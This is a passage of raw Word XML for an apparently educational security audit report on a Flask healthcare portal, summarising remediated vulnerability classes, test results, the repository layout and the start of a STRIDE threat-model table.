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1D4ED8"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>ENTERPRISE CYBERSECURITY AUDIT &amp; HARDENING</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1E3A8A"/>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:t>MedSecure Healthcare Patient &amp; Clinical Portal</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="480"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:color w:val="64748B"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Comprehensive Technical Security Audit, Vulnerability Remediation, and Defense-in-Depth Implementation Report</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4680"/>
        <w:gridCol w:w="4680"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:shd w:fill="F1F5F9"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="1E293B"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Project Target:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6192"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1E293B"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>MedSecure Healthcare Clinical &amp; Patient Portal</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:shd w:fill="F1F5F9"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="1E293B"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Audit Scope:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6192"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1E293B"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Full Stack (Flask Web App, SQLite DB Layer, REST API, CLI, Storage Engine)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:shd w:fill="F1F5F9"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="1E293B"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Compliance Standards:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6192"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1E293B"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>HIPAA Security Rule (§ 164.312), NIST SP 800-63B, OWASP Top 10 (2021)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:shd w:fill="F1F5F9"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="1E293B"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Analysis Engines:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6192"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1E293B"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Bandit AST Security Scanner v1.9.4 &amp; Pytest 9.1.1 Security Test Harness</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:shd w:fill="F1F5F9"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="1E293B"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Remediation Status:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6192"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1E293B"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>100% Resolved — 14 Vulnerabilities Reduced to 0 (36/36 Tests Passed)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:shd w:fill="F1F5F9"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="1E293B"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>GitHub Repository:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6192"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1E293B"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>https://github.com/jha552093-cyber/-5-Task---Security-Enhancements-in-Python-Applications.git</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="360" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1E3A8A"/>
          <w:sz w:val="34"/>
        </w:rPr>
        <w:t>1. Executive Summary</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Modern healthcare web applications handle high-risk Protected Health Information (PHI) and Personally Identifiable Information (PII), subjecting them to strict regulatory mandates such as the HIPAA Security Rule (45 CFR § 164.312), NIST Special Publication 800-63B, and GDPR Article 32. This security audit and engineering initiative evaluated the MedSecure Healthcare Portal, an enterprise clinical records system that provides role-based interfaces for physicians, nurses, billing personnel, administrators, and patients.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A baseline assessment of the original application revealed severe systemic vulnerabilities across every tier of the architecture: database injection, weak password storage, unencrypted sensitive fields at rest, remote command execution, path traversal, arbitrary object deserialization, cross-site scripting (XSS), insecure direct object references (IDOR), and lack of credential stuffing defenses. Through a rigorous defense-in-depth remediation lifecycle, the entire software stack was re-engineered, culminating in complete elimination of all identified flaws and full compliance validation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="280" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1D4ED8"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Key Audit &amp; Remediation Highlights</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2340"/>
        <w:gridCol w:w="2340"/>
        <w:gridCol w:w="2340"/>
        <w:gridCol w:w="2340"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2340"/>
            <w:shd w:fill="EFF6FF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="40" w:type="dxa"/>
              <w:left w:w="60" w:type="dxa"/>
              <w:right w:w="60" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="1E3A8A"/>
                <w:sz w:val="32"/>
              </w:rPr>
              <w:t>14 -&gt; 0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2340"/>
            <w:shd w:fill="EFF6FF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="40" w:type="dxa"/>
              <w:left w:w="60" w:type="dxa"/>
              <w:right w:w="60" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="1E3A8A"/>
                <w:sz w:val="32"/>
              </w:rPr>
              <w:t>36 / 36</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2340"/>
            <w:shd w:fill="EFF6FF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="40" w:type="dxa"/>
              <w:left w:w="60" w:type="dxa"/>
              <w:right w:w="60" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="1E3A8A"/>
                <w:sz w:val="32"/>
              </w:rPr>
              <w:t>10 / 10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2340"/>
            <w:shd w:fill="EFF6FF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="40" w:type="dxa"/>
              <w:left w:w="60" w:type="dxa"/>
              <w:right w:w="60" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="1E3A8A"/>
                <w:sz w:val="32"/>
              </w:rPr>
              <w:t>AES-128</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2340"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="40" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="60" w:type="dxa"/>
              <w:right w:w="60" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="1E293B"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Bandit Vulnerabilities</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="64748B"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>100% Elimination</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2340"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="40" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="60" w:type="dxa"/>
              <w:right w:w="60" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="1E293B"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Automated Pytest Suite</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="64748B"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>100% Test Pass Rate</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2340"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="40" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="60" w:type="dxa"/>
              <w:right w:w="60" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="1E293B"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Simulated Exploits</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="64748B"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>100% Exploit Blocked</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2340"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="40" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="60" w:type="dxa"/>
              <w:right w:w="60" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="1E293B"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Fernet AEAD At-Rest</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="64748B"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>Zero Plaintext PHI</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00" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="160" w:type="dxa"/>
              <w:right w:w="160" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="15803D"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Audit Outcome Statement</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1E293B"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Static code scanning using Bandit AST analyzer detected 14 vulnerabilities (3 High, 8 Medium, 3 Low) in the baseline codebase. Following the implementation of parameterized queries, cryptographic abstractions, path sanitization, and input validation, a re-scan of the hardened codebase yielded exactly 0 security issues.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="360" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1E3A8A"/>
          <w:sz w:val="34"/>
        </w:rPr>
        <w:t>2. Project Description &amp; Architectural Overview</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>The MedSecure Healthcare Portal project was developed as a comprehensive educational and reference implementation demonstrating how common software flaws manifest in real-world Python applications, how threat actors exploit them, and how software security engineers systematically eliminate them using defense-in-depth principles.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="280" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1D4ED8"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>2.1 Repository Architecture</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>The repository is organized into distinct parallel application trees to provide a side-by-side contrast of vulnerable versus hardened patterns, supported by comprehensive automation, static scanning, and test harnesses:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">vulnerable_app/: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Baseline vulnerable Flask application containing deliberate security anti-patterns (string formatting SQL, unsalted MD5 hashes, cleartext PHI at rest, unescaped HTML reflection, shell command execution, raw pickle deserialization, path traversal, IDOR).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">secure_app/: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Production-grade, hardened Flask application implementing modern defenses (strictly parameterized SQLite queries, PBKDF2-HMAC-SHA256 with CSPRNG salts, AES authenticated encryption for PHI, HTML entity encoding, native socket diagnostics without shell, tamper-proof HMAC JSON serialization, canonical path confinement, strict RBAC).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">tests/: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Pytest automated verification suite containing 36 tests across functional tests, cryptographic validation, and live exploit simulation harnesses.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">static_analysis/: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Automated Bandit AST configuration files and comparative scan output reports demonstrating 100% remediation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">reports/: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Comprehensive documentation including Markdown threat matrices, applied security measures, ReportLab PDF generator, and this Word project report.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">scripts/: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Execution automation tools including run_audit.py, live exploit simulator simulate_attacks.py, and deliverable packager package_deliverables.py.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="360" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1E3A8A"/>
          <w:sz w:val="34"/>
        </w:rPr>
        <w:t>3. Threat Modeling &amp; Scope</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Threat modeling was conducted using Microsoft's STRIDE methodology to evaluate attack surfaces across the web tier, API endpoints, session manager, local SQLite storage engine, and diagnostic maintenance utilities.</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2340"/>
        <w:gridCol w:w="2340"/>
        <w:gridCol w:w="2340"/>
        <w:gridCol w:w="2340"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:shd w:fill="1E3A8A"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>STRIDE Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="1E3A8A"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Target Asset / Endpoint</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2592"/>
            <w:shd w:fill="1E3A8A"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
